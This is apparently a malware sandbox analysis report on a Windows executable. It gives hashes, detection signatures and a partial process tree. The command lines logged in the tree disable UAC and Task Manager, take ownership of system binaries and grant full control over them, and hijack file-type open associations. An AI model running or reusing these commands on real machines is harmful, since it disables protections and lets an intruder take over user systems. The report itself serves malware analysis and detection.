Analysis
-
max time kernel
102s -
max time network
102s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
05-11-2024 12:29
Static task
static1
Behavioral task
behavioral1
Sample
458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe
Resource
win10v2004-20241007-en
General
-
Target
458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe
-
Size
574KB
-
MD5
e39790d2164de5008c336fed365a3510
-
SHA1
eeeb523b1c7e956312e07cdf1456e021978a6b9e
-
SHA256
458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03
-
SHA512
0a8ee2ec841ee3898899c8f41bc427aa4b6e674931ca4ee7a544be4c180fb1974df3acdfdb9e48336619086e2e7d2d778603d37b7b06fe7cec8501ba76906c27
-
SSDEEP
12288:/pW2IoioS6p8IReqYIiYkYAY6YLYr5bVY4:/qon8
Malware Config
Signatures
-
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 64 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exepid process 4232 icacls.exe 5504 takeown.exe 1076 icacls.exe 3812 takeown.exe 6056 icacls.exe 4444 icacls.exe 2696 icacls.exe 1736 takeown.exe 5528 icacls.exe 4420 icacls.exe 4056 icacls.exe 5376 takeown.exe 5808 takeown.exe 1796 takeown.exe 2556 icacls.exe 5384 icacls.exe 4464 icacls.exe 4704 icacls.exe 2612 icacls.exe 5416 takeown.exe 5612 icacls.exe 3664 icacls.exe 1264 icacls.exe 6036 icacls.exe 2296 icacls.exe 1032 icacls.exe 4600 icacls.exe 2196 icacls.exe 1804 takeown.exe 5616 icacls.exe 5452 takeown.exe 3032 icacls.exe 2684 takeown.exe 3196 icacls.exe 5140 takeown.exe 5052 icacls.exe 5472 icacls.exe 776 takeown.exe 3024 icacls.exe 4508 takeown.exe 2680 takeown.exe 5184 takeown.exe 2848 takeown.exe 5300 takeown.exe 5540 icacls.exe 5672 icacls.exe 1816 takeown.exe 5960 icacls.exe 5732 icacls.exe 4692 icacls.exe 4372 icacls.exe 2656 icacls.exe 4468 icacls.exe 1864 icacls.exe 4472 takeown.exe 1960 icacls.exe 5800 icacls.exe 3692 icacls.exe 2476 icacls.exe 4408 icacls.exe 5964 takeown.exe 3960 icacls.exe 5832 icacls.exe 548 takeown.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe -
Modifies file permissions 1 TTPs 64 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exepid process 5360 icacls.exe 5064 icacls.exe 5312 icacls.exe 2360 icacls.exe 5868 takeown.exe 3692 icacls.exe 1804 takeown.exe 4072 takeown.exe 4872 icacls.exe 5176 icacls.exe 4704 icacls.exe 2476 icacls.exe 768 icacls.exe 2404 icacls.exe 3192 icacls.exe 4472 takeown.exe 1344 takeown.exe 4668 takeown.exe 3824 takeown.exe 5740 icacls.exe 2848 takeown.exe 5588 takeown.exe 5872 takeown.exe 5800 icacls.exe 2928 icacls.exe 5808 takeown.exe 6080 takeown.exe 4796 takeown.exe 5132 takeown.exe 4832 icacls.exe 5704 icacls.exe 4604 takeown.exe 5052 icacls.exe 5756 takeown.exe 6036 icacls.exe 4152 takeown.exe 5336 icacls.exe 2808 icacls.exe 5300 takeown.exe 4468 takeown.exe 2708 takeown.exe 5276 takeown.exe 5396 takeown.exe 5720 takeown.exe 5492 takeown.exe 5140 takeown.exe 6104 icacls.exe 1404 takeown.exe 5604 takeown.exe 956 icacls.exe 5384 icacls.exe 2216 takeown.exe 692 takeown.exe 1264 takeown.exe 4440 takeown.exe 5612 icacls.exe 3544 takeown.exe 6052 takeown.exe 3196 icacls.exe 4432 takeown.exe 3932 takeown.exe 2324 takeown.exe 4852 takeown.exe 4408 icacls.exe -
Modifies system executable filetype association 2 TTPs 1 IoCs
Processes:
458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe BATCF %1" 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Drops file in System32 directory 1 IoCs
Processes:
458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exedescription ioc process File opened for modification C:\Windows\System32\SpatialAudioLicenseSrv.exe 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 10 IoCs
Processes:
458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe BATCF %1" 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe CMDSF %1" 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe JPGIF %1" 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open\Command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe VBSSF %1" 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe HTMWF %1" 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\rtffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe RTFDF %1" 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe NTPAD %1" 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe NTPAD %1" 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe NTPAD %1" 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe NTPAD %1" 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe -
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes:
458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exepid process 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exepid process 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
Processes:
458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exedescription pid process Token: SeDebugPrivilege 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe Token: SeTakeOwnershipPrivilege 1564 takeown.exe Token: SeTakeOwnershipPrivilege 2216 takeown.exe Token: SeTakeOwnershipPrivilege 1196 takeown.exe Token: SeTakeOwnershipPrivilege 4684 takeown.exe Token: SeTakeOwnershipPrivilege 2848 takeown.exe Token: SeTakeOwnershipPrivilege 5112 takeown.exe Token: SeTakeOwnershipPrivilege 2684 takeown.exe Token: SeTakeOwnershipPrivilege 4852 takeown.exe Token: SeTakeOwnershipPrivilege 692 takeown.exe Token: SeTakeOwnershipPrivilege 1092 takeown.exe Token: SeTakeOwnershipPrivilege 4120 takeown.exe Token: SeTakeOwnershipPrivilege 3940 takeown.exe Token: SeTakeOwnershipPrivilege 1628 takeown.exe Token: SeTakeOwnershipPrivilege 1344 takeown.exe Token: SeTakeOwnershipPrivilege 4796 takeown.exe Token: SeTakeOwnershipPrivilege 776 takeown.exe Token: SeTakeOwnershipPrivilege 3160 takeown.exe Token: SeTakeOwnershipPrivilege 5648 takeown.exe Token: SeTakeOwnershipPrivilege 4472 takeown.exe Token: SeTakeOwnershipPrivilege 1736 takeown.exe Token: SeTakeOwnershipPrivilege 3416 takeown.exe Token: SeTakeOwnershipPrivilege 5756 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exedescription pid process target process PID 1308 wrote to memory of 1916 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe reg.exe PID 1308 wrote to memory of 1916 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe reg.exe PID 1308 wrote to memory of 4596 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe reg.exe PID 1308 wrote to memory of 4596 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe reg.exe PID 1308 wrote to memory of 1564 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 1564 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 1724 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 1724 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 2216 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 2216 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 1444 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 1444 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 1196 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 1196 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 3032 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 3032 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 4684 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 4684 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 2296 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 2296 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 2684 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 2684 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 4004 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 4004 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 5112 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 5112 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 4464 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 4464 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 1092 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 1092 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 4232 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 4232 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 2848 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 2848 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 2676 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 2676 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 692 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 692 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 1824 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 1824 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 4852 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 4852 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 1864 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 1864 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 4796 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 4796 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 2028 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 2028 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 4120 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 4120 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 2696 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 2696 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 1628 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 1628 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 1488 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 1488 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 3160 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 3160 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 2196 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 2196 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 776 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 776 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe takeown.exe PID 1308 wrote to memory of 2860 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe PID 1308 wrote to memory of 2860 1308 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe icacls.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe"C:\Users\Admin\AppData\Local\Temp\458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe"1⤵
- Checks computer location settings
- Modifies system executable filetype association
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
- Modifies registry key
PID:1916 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
PID:4596 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\bfsvc.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1564 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\bfsvc.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1724
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\HelpPane.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2216 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\HelpPane.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1444
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\hh.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1196 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\hh.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3032 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\splwow64.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4684 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\splwow64.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2296 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\winhlp32.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2684 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\winhlp32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4004
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\write.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5112 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\write.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4464 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\SysWOW64\raserver.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1092 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\raserver.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4232 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\SysWOW64\msra.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2848 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msra.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2676
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\SysWOW64\quickassist.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:692 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\quickassist.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1824
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\SysWOW64\sdchange.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4852 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdchange.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1864 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\SysWOW64\CameraSettingsUIHost.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4796 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\CameraSettingsUIHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2028
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\SysWOW64\logagent.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4120 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\logagent.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2696 -
